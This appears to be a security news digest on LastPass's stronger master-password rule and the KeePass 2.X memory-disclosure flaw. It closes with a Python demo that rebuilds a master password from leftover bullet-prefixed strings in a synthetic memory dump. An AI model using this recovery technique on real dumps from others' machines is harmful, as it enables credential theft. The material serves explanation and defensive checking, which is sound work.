LastPass is enforcing a new security measure that requires users to set a stronger master password of at least 12 characters, including a special character, a number, and an uppercase letter. The move is a response to evolving threats and follows the 2022 breach in which attackers obtained sensitive customer data. LastPass vaults are encrypted with a key derived from the master password, so once a copy of an encrypted vault is in an attacker's hands, the strength of that password is what limits offline brute forcing. The company has applied the 12-character standard to new users and to users resetting their passwords since last year; it is now extending the requirement to all existing users so that every vault's encryption key is derived from a password of at least that strength.
A newly discovered vulnerability in the KeePass password manager allows the master password to be recovered in plaintext from a memory dump, even when the database is locked or the program has been closed. A fix is expected in early June, but upgrading to the fixed version does not remove copies of the password that may already have been written to disk before the upgrade, for example in the page file, the hibernation file or crash dumps. Users can reduce their exposure by not letting untrusted individuals use their computer, running a reputable antivirus product, and changing their master password after upgrading so that any stale copies become worthless. So far this is a proof of concept rather than a vulnerability seen exploited in the wild.
A major vulnerability has been discovered in the KeePass password manager that allows an attacker to extract a user's master password in plaintext from the target computer's memory, even if the app is locked or closed. Exploitation requires local access: either physical access to the machine, or malware already running on it that dumps the KeePass process memory and sends the dump to the attacker's server. KeePass's developer is working on a fix, but it is not expected until June or July 2023. In the meantime, users should avoid installing apps or opening files from unknown senders, use an antivirus app, and never share their password manager's master password with anyone.
A vulnerability in the KeePass password manager can be exploited to retrieve the master password from the software's memory. A PoC exploitation tool is publicly available, but the flaw is not remotely exploitable on its own: the attacker must first obtain a memory dump or other access to the machine. The vulnerability affects the KeePass 2.X branch for Windows, and possibly the Linux and macOS builds as well. It has been fixed in the test versions of KeePass v2.54, with the official release expected by July 2023. KeePassXC, a community fork of KeePassX, is not affected.
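The three KeePass items above describe the same memory-disclosure issue: before the fix, each keystroke in the masked master-password box left behind a string consisting of the previously typed characters rendered as bullets (U+2022) followed by the newly typed character, and those strings were never wiped, so a memory dump contains "•a", "••s", "•••s" and so on, from which everything but the first character can be reassembled. The following added example, written for this page and not taken from KeePass or from the public PoC tool, demonstrates that reconstruction over a constructed UTF-16LE memory image; `build_constructed_dump` fabricates the leftover strings and the noise, and the byte layout is a simplification of the real managed heap, so a real dump may need more careful carving. The scanning logic is the same that a defender would use to confirm whether a page file or crash dump from before the upgrade still contains the old password.

```python
import re
from collections import defaultdict
from typing import Dict, List

# U+2022 BULLET is the masking character the KeePass 2.X master-password box displayed.
BULLET = "\u2022"
BULLET_U16 = BULLET.encode("utf-16-le")  # b'\x22\x20'


def build_constructed_dump(password: str, noise: bytes = b"") -> bytes:
    """Build a synthetic memory image (constructed for this demo, not a real dump).

    Before KeePass 2.54, every keystroke in the masked text box produced a fresh
    .NET string of (n-1) bullets followed by the n-th typed character, and the
    earlier strings were left behind in memory. The first keystroke produces a
    string with no bullet prefix, which is why the first character is not
    recoverable by this method; it is therefore not emitted here either.
    """
    parts: List[bytes] = [b"\x00" * 32, noise, b"\x00" * 32]
    for n, ch in enumerate(password, start=1):
        if n == 1:
            continue
        parts.append((BULLET * (n - 1) + ch).encode("utf-16-le"))
        parts.append(b"\x00" * 8)  # padding standing in for unrelated heap objects
    return b"".join(parts)


# One or more UTF-16LE bullets followed by one code unit that is neither a bullet nor NUL.
_LEFTOVER = re.compile(rb"((?:\x22\x20)+)(?!\x22\x20|\x00\x00)(..)", re.DOTALL)


def scan_dump(dump: bytes) -> Dict[int, List[str]]:
    """Return {position: [candidate chars]} for every leftover string found.

    Position is the 0-based index of the character in the password; position 0
    never gets a candidate (see above). Several candidates at one position mean
    the scan is ambiguous there: a typo that was backspaced, or an unrelated
    string that happens to contain a bullet.
    """
    found: Dict[int, List[str]] = defaultdict(list)
    for m in _LEFTOVER.finditer(dump):
        pos = len(m.group(1)) // 2  # bullet count == index of the following char
        ch = m.group(2).decode("utf-16-le", errors="replace")
        if ch not in found[pos]:
            found[pos].append(ch)
    return dict(found)


def render_guess(found: Dict[int, List[str]]) -> str:
    """Render the reconstruction: '?' for unknown, [ab] where more than one candidate."""
    if not found:
        return ""
    out = []
    for pos in range(max(found) + 1):
        cands = found.get(pos, [])
        if not cands:
            out.append("?")
        elif len(cands) == 1:
            out.append(cands[0])
        else:
            out.append("[" + "".join(cands) + "]")
    return "".join(out)


if __name__ == "__main__":
    # Constructed password and a constructed unrelated string containing a bullet.
    secret = "Tr0ub4dor&3"
    dump = build_constructed_dump(secret, noise="Release\u2022Notes".encode("utf-16-le"))
    print(render_guess(scan_dump(dump)))  # ?[Nr]0ub4dor&3
```

The output shows the two practical limits of the technique: the first character is never recovered, and any other bullet-containing string in the image produces a spurious candidate that the attacker has to try alongside the real one. Neither limit helps much, since a short prefix and a handful of alternatives are trivially brute-forced, which is why changing the master password after upgrading is the only mitigation that makes an old dump worthless.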